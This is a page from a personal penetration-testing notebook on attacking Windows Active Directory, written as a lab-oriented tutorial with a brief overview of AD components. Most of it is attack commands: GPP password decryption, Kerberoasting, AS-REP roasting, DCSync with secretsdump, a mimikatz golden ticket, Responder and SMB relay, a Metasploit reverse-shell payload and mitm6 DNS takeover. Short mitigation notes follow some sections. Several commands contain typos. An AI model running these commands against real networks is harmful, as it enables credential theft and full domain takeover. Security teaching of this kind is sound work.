Sec-88
  • 🧑Whoami
  • 🕸️Web-AppSec
    • Features Abuse
      • 2FA
      • Ban Feature
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
      • Inviting Feature
      • Messaging Features
      • Money-Related Features
      • Newsletter
      • Profile - Settings
      • Registration
      • Reset Password
      • Review
      • Rich Editor/Text
      • Social Sharing
      • Billing-Shipping Address Management
      • Integrations - Webhooks
      • API Key Management
    • Reconnaissance
      • Attacking Organizations with big scopes
    • Subdomain Enumeration
    • Fingerprinting
    • Dorking
    • XSS-HTML Injection
    • Improper Authentication
      • JWT Security
    • OAUTH Misconfigurations
      • OAuth 2.0 Basics
      • OAUTH Misconfigurations
    • Auth0 Misconfigurations
    • Broken Access Control
      • Insecure Direct Object References (IDOR)
      • 403 Bypass
    • Broken Link Injection
    • Command Injection
    • CORS
    • CRLF
    • CSRF
    • Host Header Attacks
    • HTTP request smuggling
    • JSON Request Testing
    • LFI
      • LFI to RCE
    • No Rate Limit
    • Parameters Manual Testing
    • Open Redirect
    • Registration & Takeover Bugs
    • Remote Code Execution (RCE)
    • Session Fixation
    • SQL Injection
      • SQL To RCE
    • SSRF
    • SSTI
    • Subdomain Takeover
    • Web Caching Vulnerabilities
    • WebSockets
    • XXE
      • XXE to RCE
    • Cookie Based Attacks
    • CMS
      • AEM [Adobe CMS]
    • XSSI (Cross Site Script Inclusion)
    • NoSQL injection
    • Local VS Remote Session Fixation
    • Protection
      • Security Mechanisms for Websites
      • Cookie Flags
      • SameSite Cookie Restrictions
      • Same-origin policy (SOP)
      • CSP
    • Hacking IIS Applications
    • Dependency Confusion
    • Attacking Secondary Context
    • Hacking Web Sockets
    • IDN Homograph Attack
    • DNS Rebinding Attack
    • LLM Hacking Checklist
    • Bypass URL Filtration
    • Cross-Site Path Traversal (CSPT)
    • PostMessage Security
    • Prototype Pollution
      • Client-Side Prototype Pollution
      • Server-Side prototype pollution
    • Tools-Extensions-Bookmarks
    • WAF Bypassing Techniques
    • SSL/TLS Certificate Lifecycle
    • Serialization in .NET
    • Client-Side Attacks
      • JavaScript Analysis
    • Bug Bounty Platforms/Programs
  • ✉️API-Sec
    • GraphQL API Security Testing
      • The Basics
      • GraphQL Communication
      • Setting Up a Vulnerable GraphQL Server
      • GraphQL Hacking Tools
      • GraphQL Attack Surface
      • RECONNAISSANCE
      • GraphQL DOS
      • Information Disclosure
      • AUTHENTICATION AND AUTHORIZATION BYPASSES
      • Injection Vulnerabilities in GraphQL
      • REQUEST FORGERY AND HIJACKING
      • VULNERABILITIES, REPORTS AND EXPLOITS
      • GraphQL Hacking Checklist
    • API Recon
    • API Token Attacks
    • Broken Object Level Authorization (BOLA)
    • Broken Authentication
    • Evasive Maneuvers
    • Improper Assets Management
    • Mass Assignment Attacks
    • SSRF
    • Injection Vulnerabilities
    • Excessive Data Exposure
    • OWASP API TOP 10 MindMap
    • Scanning APIs with OWASP ZAP
  • 📱Android-AppSec
    • Setup Android App Pentesting environment on Arch
    • Setup Android App Pentesting environment on Mac M4
    • Setup Android Pentesting Environment on Debian Linux
    • Android App Fundamentals
      • Android Architecture
      • Android Security Model
      • Android App Components
        • Intents
        • Pending Intents
    • Android App Components Security Cheatsheet
    • Android App Pentesting Checklist
    • How To Get APK file for application
    • ADB Commands
    • APK structure
    • Android Permissions
    • Exported Activity Hacking
    • BroadcastReceiver Hacking
    • Content Provider Hacking
    • Signing the APK
    • Reverse Engineering APK
    • Deep Links Hacking
    • Drozer Cheat Sheet
    • SMALI
      • SMALI Cheat Sheet
      • Smali Code Patching Guide
    • Intent Redirection Vulnerability
    • Janus Vulnerability (CVE-2017-13156)
    • Task Hijacking
    • Hacking Labs
      • Injured Android
      • Hacking the VulnWebView Lab
      • Hacking InsecureBankv2 App
    • Frida Cheat Sheet
  • 📶Network-Sec
    • Networking Fundamentals
    • Open Ports Security Testing
    • Vulnerability Scanning
    • Client Side Attacks
    • Port Redirection and Tunneling
    • Password Attacks
    • Privilege Escalation [PrevEsc]
      • Linux Privilege Escalation
    • Buffer Overflow (BOF)
      • VulnServer
      • Sync Breez Enterprize
      • Crashed CTF
      • BOF for Linux
    • AV Evasion
    • Post Exploitation
      • File Transfer
      • Maintaining Access
      • Pivoting
      • Clean Up
    • Active Directory
      • Basic AD Pentesting
  • 💻Desktop AppSec
    • Thin Client vs. Thick Client
  • ☁️Cloud Sec
    • Salesforce Hacking
      • Basics
      • Salesforce SAAS Apps Hacking
    • Firebase
    • S3 Buckets Misconfigurations
  • 👨‍💻Programming
    • HTML
    • JavaScript (JS)
      • window.location object
    • Python
      • Python Tips
      • Set
        • SetMethods
    • JAVA
      • Java Essentials
      • Java Essentials Code Notes
      • Java OOP1
      • JAVA OOP Principles
        • Inheritance
        • Method Overriding
        • Abstract Class
        • Interface
        • polymorphism
        • Encapsulation
        • Composition
      • Java OOP Challenges
      • Exception Handling
    • Go
      • Go Syntax Tutorial in one file
      • Methods and Interfaces
      • Go Slices
      • Go Maps
      • Go Functions
      • Concurrency
      • Read Files
      • Write Files
      • Package
        • How to make personal Package
        • regexp Packages
        • Json
        • bufio
        • Time
      • Signals-Exit
      • Unit Testing
  • 🖥️Operating Systems
    • Linux
      • Linux Commands
      • Tools
      • Linux File System
      • Bash Scripting guide
      • tmux
      • Git
      • Install Go tools from private repositories using GitHub PAT
    • VPS
    • Burp Suite
  • ✍️Write-Ups
    • Hunting Methodology
    • API BAC leads to PII Data Disclosure
    • Misconfigured OATUH leads to Pre-Account Takeover
    • Automating Bug Bounty with GitHub Actions
    • From Recon to Reward: My Bug Bounty Methodology when Hunting on Public Bug Bounty Programs
    • Exploring Subdomains: From Enumeration to Takeover Victory
    • 0-Click Account Takeover via Insecure Password Reset Feature
    • How a Simple Click Can Lead to Account Takeover: An OAuth Insecure Implementation Vulnerability
    • The Power Of IDOR even if it is unpredictable IDs
    • Unlocking the Weak Spot: Exploiting Insecure Password Reset Tokens
    • AI Under Siege: Discovering and Exploiting Vulnerabilities
    • Inside the Classroom: How We Hacked Our Way Past Authorization on a Leading EdTech Platform
    • How We Secured Our Client’s Platform Against Interaction-Free Account Thefts
    • Unchecked Privileges: The Hidden Risk of Role Escalation in Collaborative Platforms
    • Decoding Server Behavior: The Key to Mass Account Takeover
    • Exploiting JSON-Based CSRF: The Hidden Threat in Profile Management
    • How We Turned a Medium XSS into a High Bounty by Bypassing HttpOnly Cookie
Powered by GitBook
On this page
  • AD Components
  • Initial Attack Vectors
  • Enumeration

Was this helpful?

Edit on GitHub
  1. Network-Sec
  2. Active Directory

Basic AD Pentesting

AD Components

Domain Controller

  • Server with AD DS server role.

  • Hosts a copy of the AD DS directory store.

  • Provides authentication and authorization services.

  • Replicates updates to other domain controllers.

  • Allows administrative access to manage resources.

AD DS Data Store

  • Consists of the Ntds.dit file (password hashes, sensitive information).

  • Stored in the %SystemRoot%\NTDS folder on all domain controllers.

AD Logical Components

  • Schema:

    • Defines objects that can be stored in the directory.

    • Enforces rules about object creation and configuration.

  • Domains:

    • Group and manage objects in an organization.

    • May include child domains and trusts with other domains.

  • Trees:

    • Hierarchy of domains in AD DS.

    • Can have child domains.

    • Creates two-way transitive trust with other domains.

  • Forests:

    • Collection of Trees.

    • Shares common schema and configuration.

    • Enables trusts between domains in the forest.

    • Shares enterprise admin, schema admins groups.

  • Organizational Units (OUs):

    • Containers that can contain users, groups, computers, and other OUs.

  • Trusts:

    • Provide mechanisms for users to gain access.

  • Objects:

    • Users, contacts, groups, computers, printers, shared folders, etc.

Initial Attack Vectors

  • Begin with mitm6 or Responder.

  • Run a scan to generate traffic.

  • Look for default credentials on web logins.

  • Target websites in scope (http_version).

  • Consider printers, Jenkins, etc.

  • Think outside the box.

Additional Resources:

Enumeration

Kerberos Enumeration

  1. Nmap Scan:

    nmap -T5 10.10.10.100

  2. SMB Enumeration:

    smbclient -L \\\\10.10.10.100\\

  3. Replication:

    smbclient \\\\10.10.10.100\\Replication

    • In the Replication directory, look for Groups.xml file.

  4. Extracting cPassword:

    • Copy the cPassword attribute from Groups.xml.

    • Use gpp-decrypt to decrypt the password:

      gpp-decrypt <cpassword>

  5. Psexec.py with Hash:

    psexec.py active.htp /svc_tags:<cpassword>@10.10.10.100

  6. Kerberoasting with GetUserSPNs.py:

    python3 GetUserSPNs.py limbawy.local/ahmed:Password -dc-ip 192.168.1.10 -request

    • Save the hash to TGS.txt.

    • Crack the hash using john:

      sudo john TGS.txt

  7. ASREPRoast with GetNPUsers.py:

    python3 GetNPUsers.py limbawy.local/levi -dc-ip 192.168.1.10

    • Save the hash to TGT.txt.

    • Crack the hash using john:

      sudo john TGT.txt

  8. BloodHound for Full Control:

    bloodhound-python -u Levi -p Password -ns 192.168.1.10 -d limbawy.local -c All

  9. DC Sync Attack with secretsdump.py:

    python3 secretsdump.py limbawy.local/Levi:Password@192.168.1.10 -use-vss

  10. Golden Ticket with mimikatz:

    mimikatz # kerberos:golden /domain:limbawy.local /sid:S-1-5-21-1314916712-2918817657-636196047 /user:Administrator:13dadc78472c366a7cd1cea42347af18 /krbtgt:b3a2e1bb5cb5e94a27f1884d86bca6c2 /ptt

LMNR

  • LMNR (Link-Local Multicast Name Resolution) Attack Workflow:

    1. Use responder:

      responder -I tun0 -rdw

    2. Wait for events.

    3. Retrieve hashes.

    4. Crack hashes using hashcat:

      hashcat -m 5600 hashes.txt rockyou.txt

  • Defense:

    • Disable LMNR and NBT-NS.

    • Enforce strong user passwords.

SMB

  1. Identify SMB Signing:

    nmap --script=smb2-security-mode.nse -p 445 192.168.57.0/24

  2. SMB Relay Attack Workflow:

    • Edit responder.conf to turn off SMB and HTTP.

    • Run responder:

      responder -I eth0 -rdw -w

    • Run ntlmrelayx.py:

      ntlmrelayx.py -tf targets.txt -smb2support

  3. Gaining a Shell using MSF:

    msfconsole
search psexec
set rhost target_ip
set smbdomain <domain_here>
set smpass <password_u_cracked_here>
set payload windows/x64/meterpreter/reverse_tcp
set lhost eth0
run

  4. Other Ways to Psexec:

    psexec.py marvel.local/fcastle:password1:@192.168.57.141
smbexec.py marvel.local/fcastle:password1:@192.168.57.141
wmiexec.py marvel.local/fcastle:password1:@192.168.57.141

  • Mitigation:

    • Enable SMB Signing.

    • Disable NTLM authentication.

    • Implement account tiering.

    • Restrict local admin access.

IPv6 Attacks

  1. Install mitm6:

    pip3 install mitm6

  2. Setup LDAP for DNS Takeover:

    • Go to Server Manager.

    • Add the AD Cert Services feature.

  3. DNS Takeover via mitm6 Workflow:

    mitm6 -d marvel.local

  4. Delegate Impersonation Attack with ntlnrelayx.py:

    ntlmrelayx.py -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme

  • Mitigation:

    • Disable IPv6.

    • Disable WPAD.

    • Enable LDAP signing.

    • Consider administrative users in the protected users group.

Passback Attack

PreviousActive DirectoryNextDesktop AppSec

Last updated 1 year ago

Was this helpful?

📶
Top Five Ways I Got Domain Admin on Your Internal Network Before Lunch (2018 Edition)
The worst of both worlds: Combining NTLM Relaying and Kerberos delegation
How to Hack Through a Pass-back Attack